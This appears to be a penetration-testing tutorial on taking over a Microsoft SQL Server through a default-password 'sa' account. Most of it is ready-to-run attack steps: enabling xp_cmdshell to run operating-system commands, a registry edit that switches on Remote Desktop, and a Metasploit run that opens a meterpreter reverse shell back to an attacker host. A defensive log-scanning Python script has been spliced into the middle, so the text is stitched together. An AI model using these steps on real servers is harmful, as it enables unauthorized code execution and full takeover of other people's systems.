In this article, we’ll cover connecting to a Microsoft SQL (MSSQL) server from the Backtrack/Linux command line, executing system commands through the ‘sa’ or other administrative account, and finally exploiting the ‘sa’ account through metasploit.

To start with, let’s cover a quick HOWTO on getting an MSSQL client working under Backtrack/Linux. We’ll need freetds and sqsh for this:

apt-get install sqsh freetds-bin freetds-common freetds-dev

Once done, we’ll need to edit /etc/freetds/freetds.conf, and append the following to it:

[MyServer]
host = 192.168.1.10
port = 1433
tds version = 8.0

And lastly, we’ll edit ~/.sqshrc:

\set username=sa
\set password=password
\set style=vert

Finally, we connect by issuing:

sqsh -S MyServer

If all went well, we should now be waiting at a prompt. First, let's see if we can enumerate a list of available databases with:

SELECT name FROM master..sysdatabases
go

Here are the results:

[Screenshot: MSSQL Database List]

Great, so we're logged in as the system administrator ('sa') user, and we've managed to run a query to enumerate a list of databases. At this point, we can use regular MSSQL syntax to interact with the server as we wish.

Taking a few steps back: by default, the 'sa' account has a default password of 'password', and on our target system this had not been changed. Had the system administrator set a password, we could use 'mssql_brute.rc' from Metasploit or nmap's ms-sql-brute script to brute force the account password.

Back to the task at hand: now that we have MSSQL sa access, how can this be leveraged for remote code execution? This is where the 'xp_cmdshell' feature within MSSQL becomes useful. Prior to SQL Server 2005, xp_cmdshell was enabled by default; from 2005 onwards it is disabled by default. Assuming that xp_cmdshell is disabled, we first need to enable it as follows:

exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go
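As an added defensive counterpart (not part of the original post), the following Python script scans SQL Server ERRORLOG text for the sp_configure sequence above: it flags any session that switches xp_cmdshell (or a similar procedure) on, and raises the severity when the same spid enabled 'show advanced options' just before. The log lines are constructed samples; the option names and the "Configuration option ... changed from X to Y" message format are those SQL Server writes on configuration changes.

```python
import re
from dataclasses import dataclass

# Constructed sample ERRORLOG lines (not from the post); format mirrors SQL Server's config-change message.
SAMPLE_ERRORLOG = """\
2024-01-15 10:02:11.45 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-15 10:02:11.52 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-15 10:05:30.10 spid57      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-01-15 10:09:02.00 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# Matches the "Configuration option '<name>' changed from X to Y." message.
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+(?P<spid>spid\d+)\s+Configuration option "
    r"'(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# sp_configure options that give SQL logins OS-level or out-of-process execution.
DANGEROUS_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}

@dataclass
class Alert:
    timestamp: str
    spid: str
    option: str
    severity: str  # "high" when the same spid enabled 'show advanced options' first

def detect_dangerous_enables(log_text: str) -> list[Alert]:
    """Scan ERRORLOG text and return one alert per dangerous option switched on."""
    advanced_on: set[str] = set()  # spids with 'show advanced options' currently = 1
    alerts: list[Alert] = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        option, new_value = m["option"], int(m["new"])
        if option == "show advanced options":
            if new_value == 1:
                advanced_on.add(m["spid"])
            else:
                advanced_on.discard(m["spid"])
        elif option in DANGEROUS_OPTIONS and new_value == 1:
            # 1 -> 0 is ignored; enabling after 'show advanced options' in one session is the post's sequence
            severity = "high" if m["spid"] in advanced_on else "medium"
            alerts.append(Alert(m["ts"], m["spid"], option, severity))
    return alerts

if __name__ == "__main__":
    for a in detect_dangerous_enables(SAMPLE_ERRORLOG):
        print(f"{a.timestamp} {a.spid}: '{a.option}' enabled ({a.severity})")
```

Feed it the real ERRORLOG (or the same message text forwarded to a SIEM) and the high-severity alert corresponds to exactly the two sp_configure calls shown above.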

We can then use the procedure to run arbitrary system commands in the security context of the SQL Server service with:

xp_cmdshell 'dir c:\'
go

[Screenshot: Net Add User]

We now have a working account within the Administrators group, and can proceed to connect with our newly created account via Remote Desktop. If Remote Desktop is not currently enabled, it can be switched on with:

xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go

As a second route, we can also exploit the account using Metasploit by using mssql_payload:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.120
msf exploit(mssql_payload) > set RHOST 192.168.1.10
msf exploit(mssql_payload) > set LPORT 8080
msf exploit(mssql_payload) > set PASSWORD password
msf exploit(mssql_payload) > exploit

The command stager will upload the payload while printing its progress to the terminal, and finally:

[Screenshot: Shell]

Game Over 😉